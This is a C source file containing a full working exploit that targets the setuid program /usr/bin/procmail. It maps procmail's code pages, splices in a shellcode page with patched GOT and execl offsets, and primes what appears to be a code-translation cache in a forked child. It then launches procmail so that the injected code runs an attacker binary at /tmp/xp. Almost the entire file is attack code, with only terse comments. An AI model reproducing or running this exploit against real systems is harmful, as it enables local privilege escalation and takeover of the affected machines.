#define _GNU_SOURCE
#include <stdint.h>
#include <stdlib.h>
#include <stdio.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <dlfcn.h>
#include <string.h>
#include <sys/wait.h>

#define TARGET "/usr/bin/procmail"
#define TARGET_LOAD_ADDR 0x400000
#define CODE_START_OFFSET 0x3ffb
#define EVIL_PAGE_OFFSET 0x4000
#define HARMLESS_CODE_CARRYOVER 2
#define LIBC_START_MAIN_GOT_ADDR 0x615160
#define BASIC_BLOCK_START 0x403ffb

void *mmap_file(void *addr, char *path, size_t size, off_t offset) {
	int fd = open(path, O_RDONLY);
	if (fd == -1)
		err(1, "open %s", path);
	void *mapping = mmap(addr, size, PROT_READ|PROT_EXEC, MAP_SHARED|MAP_LOCKED|(addr?MAP_FIXED:0), fd, offset);
	if (mapping == MAP_FAILED)
		err(1, "mmap");
	close(fd);
	return mapping;
}

void *fixup_loc(char *buf, size_t buflen, uint64_t needle_, size_t needle_len) {
	char needle[8];
	if (needle_len == 8)
		*(uint64_t*)needle = needle_;
	else if (needle_len == 4)
		*(uint32_t*)needle = needle_;
	else
		errx(1, "needle_len weird");
	char *loc = memmem(buf, buflen, needle, needle_len);
	if (loc == NULL)
		errx(1, "fixup_loc: can't find needle");
	if (memmem(loc + 1, buflen - 1 - (loc - buf), needle, needle_len) != NULL)
		errx(1, "fixup_loc: duplicate needle");
	return loc;
}

int main(void) {
	system("cp xp /tmp/xp");

	long execl_offset = ((char*)dlsym(RTLD_DEFAULT, "execl")) - ((char*)dlsym(RTLD_DEFAULT, "__libc_start_main"));

	int target_fd = open(TARGET, O_RDONLY);
	if (target_fd == -1)
		err(1, "open");
	char *load_addr = (char*)(TARGET_LOAD_ADDR + EVIL_PAGE_OFFSET - 0x1000);
	char *target_mapping = mmap(load_addr, 0x3000, PROT_READ|PROT_EXEC,
		MAP_SHARED|MAP_LOCKED, target_fd, EVIL_PAGE_OFFSET - 0x1000);
	if (target_mapping != load_addr) {
		if (target_mapping == MAP_FAILED)
			err(1, "mmap");
		else
			errx(1, "mapping collision");
	}

	// move legitimate page B
	if (mremap(load_addr+0x1000, 0x1000, 0x1000, MREMAP_MAYMOVE|MREMAP_FIXED, load_addr+0x2000) != load_addr+0x2000)
		err(1, "mremap");

	// place evil shellcode page between pages A and B
	int shellcode_fd = open("shellcode", O_RDONLY);
	if (shellcode_fd == -1)
		err(1, "open");
	char *shellcode = load_addr+0x1000;
	if (mmap(shellcode, 0x1000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, shellcode_fd, 0) != shellcode)
		err(1, "mmap");

	// fix up stuff in the shellcode
	uint64_t *libc_start_main_got_addr_loc = fixup_loc(shellcode, 0x1000, 0x1000100010001111, 8);
	uint64_t *execl_offset_loc = fixup_loc(shellcode, 0x1000, 0x2000200020002222, 8);
	*libc_start_main_got_addr_loc = LIBC_START_MAIN_GOT_ADDR;
	*execl_offset_loc = (uint64_t)execl_offset;

	// complete instruction at end of page A using start of page B
	memmove(shellcode + HARMLESS_CODE_CARRYOVER, shellcode, 0x1000 - HARMLESS_CODE_CARRYOVER);
	memcpy(shellcode, shellcode+0x1000, HARMLESS_CODE_CARRYOVER);

	// place opcode for "ret imm16" at end of shellcode page; immediate doesn't matter and comes from page B
	shellcode[0xfff] = 0xc2;

	// protect shellcode page so the copied instruction can't accidentally clobber the shellcode or whatever
	if (mprotect(shellcode, 0x1000, PROT_READ|PROT_EXEC))
		err(1, "mprotect");

	puts("memory mappings set up");

	// do codegen in child; child is going to go wild because of the copied instruction, whatever
	pid_t child = fork();
	if (child == -1)
		err(1, "fork");
	if (child == 0) {
		// procmail runs with CR0.TS=0. because CR0.TS is a flag used to filter cached
		// code, we need to ensure that our CR0.TS is also 0.
		asm volatile("fninit");

		((void(*)(void))BASIC_BLOCK_START)();
		return 0; /* very unlikely to actually be reached, but whatever */
	}

	// wait for the child to generate code, then immediately die messily
	int status;
	if (wait(&status) != child)
		err(1, "unable to wait for child");

	printf("child is dead, codegen should be complete\n");

	// okay! now launch the target. in a subprocess, because we want to keep the
	// procmail pages pinned.
	child = fork();
	if (child == -1)
		err(1, "fork");
	if (child == 0) {
		// procmail reaches the targeted code after EOF on stdin
		close(0);
		if (open("/dev/null", O_RDONLY) != 0)
			err(1, "open /dev/null");
		// to make room on procmail's stack
		char garbage[0x10000];
		memset(garbage, 'A', sizeof(garbage)-1);
		garbage[sizeof(garbage)-1] = 0;
		setenv("DUMMY1", garbage, 1);
		setenv("DUMMY2", garbage, 1);
		setenv("DUMMY3", garbage, 1);
		execlp("procmail", "procmail", NULL);
		err(1, "execlp");
	}
	if (wait(&status) != child)
		err(1, "unable to wait for child");
	puts("procmail terminated, quitting");
	return 0;
}
